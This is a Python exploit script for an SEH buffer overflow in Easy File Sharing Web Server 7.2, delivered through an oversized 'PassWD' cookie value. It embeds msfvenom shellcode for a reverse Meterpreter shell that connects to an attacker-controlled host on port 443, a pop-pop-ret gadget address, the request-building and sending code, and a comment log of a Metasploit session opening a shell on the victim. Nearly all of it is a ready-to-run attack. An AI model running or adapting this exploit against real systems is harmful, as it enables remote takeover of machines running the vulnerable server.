|
#!/usr/bin/python
#Easy File Sharing Web Server 7.2 - SEH Exploit - Tested successfully on Windows 10 x64
#GET 'passWD' Buffer Overflow(SEH)
#pop pop ret @ 0x100195f2 : pop esi pop ecx ret in ImageLoad.dll
#Author: N_A , N_A[at]tutanota.com
#OS Name: Microsoft Windows 10 Home
#OS Version: 10.0.14393 N/A Build 14393
#System Type: x64-based PC
#Vendor: http://www.sharing-file.com
#Greets: clubjk, wetw0rk - dude whut up? Sorry man i need to get down and code some BHP with you like our agreement. Raw sockets() for me :)
#Set me a task you want me to complete bro :)) Speak soon man!
#Note on exploitation: Very strange, sometimes works on the second attempt.
#root@kali:~/exploits# python naefsw.py 192.168.142.1 80
#[*]Connection to: 192.168.142.1 successful!
#[*]Evil buffer sent. G0t sh3ll?
#msf > use exploit/multi/handler
#msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
#payload => windows/meterpreter/reverse_tcp
#msf exploit(handler) > set lhost 192.168.142.128
#lhost => 192.168.142.128
#msf exploit(handler) > set lport 443
#lport => 443
#msf exploit(handler) > exploit
#[*] Started reverse TCP handler on 192.168.142.128:443
#[*] Starting the payload handler...
#[*] Sending stage (957999 bytes) to 192.168.142.1
#[*] Meterpreter session 1 opened (192.168.142.128:443 -> 192.168.142.1:57087) at 2017-07-15 07:27:54 +0100
#meterpreter > shell
#Process 9772 created.
#Channel 1 created.
#Microsoft Windows [Version 10.0.14393]
#(c) 2016 Microsoft Corporation. All rights reserved.
#
#C:\Users\NA\Desktop>
import socket, sys
def usage():
print("===============================================================================\n")
print("\t[*]Easy File Sharing Web Server 7.2 - SEH Exploit[*]\n")
print("\t[*]Spawns a reverse meterpreter shell :>[*]\n")
print("\t[*]By N_A[*]\n")
print("\t[*]Usage: [host] [port][*]\n")
print("\t[*]" +sys.argv[0] + " 192.168.142.128 80[*]\n")
print("===============================================================================\n")
if len(sys.argv) < 2:
usage()
sys.exit()
vuln = sys.argv[1] #remote host
port = sys.argv[2] #port
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.142.128 LPORT=443 -f c -b "\x00"
buf = ("\xdb\xc2\xb8\x2d\xb8\x07\x99\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
"\x54\x83\xeb\xfc\x31\x43\x14\x03\x43\x39\x5a\xf2\x65\xa9\x18"
"\xfd\x95\x29\x7d\x77\x70\x18\xbd\xe3\xf0\x0a\x0d\x67\x54\xa6"
"\xe6\x25\x4d\x3d\x8a\xe1\x62\xf6\x21\xd4\x4d\x07\x19\x24\xcf"
"\x8b\x60\x79\x2f\xb2\xaa\x8c\x2e\xf3\xd7\x7d\x62\xac\x9c\xd0"
"\x93\xd9\xe9\xe8\x18\x91\xfc\x68\xfc\x61\xfe\x59\x53\xfa\x59"
"\x7a\x55\x2f\xd2\x33\x4d\x2c\xdf\x8a\xe6\x86\xab\x0c\x2f\xd7"
"\x54\xa2\x0e\xd8\xa6\xba\x57\xde\x58\xc9\xa1\x1d\xe4\xca\x75"
"\x5c\x32\x5e\x6e\xc6\xb1\xf8\x4a\xf7\x16\x9e\x19\xfb\xd3\xd4"
"\x46\x1f\xe5\x39\xfd\x1b\x6e\xbc\xd2\xaa\x34\x9b\xf6\xf7\xef"
"\x82\xaf\x5d\x41\xba\xb0\x3e\x3e\x1e\xba\xd2\x2b\x13\xe1\xba"
"\x98\x1e\x1a\x3a\xb7\x29\x69\x08\x18\x82\xe5\x20\xd1\x0c\xf1"
"\x47\xc8\xe9\x6d\xb6\xf3\x09\xa7\x7c\xa7\x59\xdf\x55\xc8\x31"
"\x1f\x5a\x1d\xaf\x1a\xcc\x5e\x98\xab\x8c\x37\xdb\xb3\x8d\x7c"
"\x52\x55\xdd\xd2\x35\xca\x9d\x82\xf5\xba\x75\xc9\xf9\xe5\x65"
"\xf2\xd3\x8d\x0f\x1d\x8a\xe6\xa7\x84\x97\x7d\x56\x48\x02\xf8"
"\x58\xc2\xa7\xfc\x16\x23\xcd\xee\x4e\x52\x2d\xef\x8e\xff\x2d"
"\x85\x8a\xa9\x7a\x31\x90\x8c\x4d\x9e\x6b\xfb\xcd\xd9\x93\x7a"
"\xe4\x92\xa5\xe8\x48\xcd\xc9\xfc\x48\x0d\x9f\x96\x48\x65\x47"
"\xc3\x1a\x90\x88\xde\x0e\x09\x1c\xe1\x66\xfd\xb7\x89\x84\xd8"
"\xff\x15\x76\x0f\x7c\x51\x88\xcd\xa0\xfa\xe1\x2d\xe4\xfa\xf1"
"\x47\xe4\xaa\x99\x9c\xcb\x45\x6a\x5c\xc6\x0d\xe2\xd7\x86\xfc"
"\x93\xe8\x83\xa1\x0d\xe8\x27\x7a\x5b\x67\xc8\x7d\x64\x89\xf5"
"\xab\x5d\xff\x3e\x68\xda\xf0\x75\xcd\x4b\x9b\x75\x41\x8b\x8e")
seh = "\xeb\x0a\x90\x90" #jump code right here
nseh = "\xF2\x95\x01\x10" #pop pop ret @ 0x100195f2 : pop esi pop ecx ret in ImageLoad.dll
nops = "\x90"
evilbuffer = "A" * 57 + seh + nseh + nops * 10 + buf + "C" * 2000
evil = "GET /vfolder.ghp HTTP/1.1\r\n"
evil += "Host: " + vuln + "\r\n"
evil += "Cookie: SESSIONID=9999; UserID=PassWD=" + evilbuffer + "; frmUserName=; frmUserPass=;\r\n"
evil += "Connection: keep-alive" + "\r\n"
evil += "\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect = s.connect((vuln, int(port)))
print "\n[*]Connection to: " + vuln + " successful!"
except:
print "[*]Connection Error.Exiting.."
sys.exit(0)
print "[*]Evil buffer sent. G0t sh3ll?\n"
s.send(evil)
s.close()
|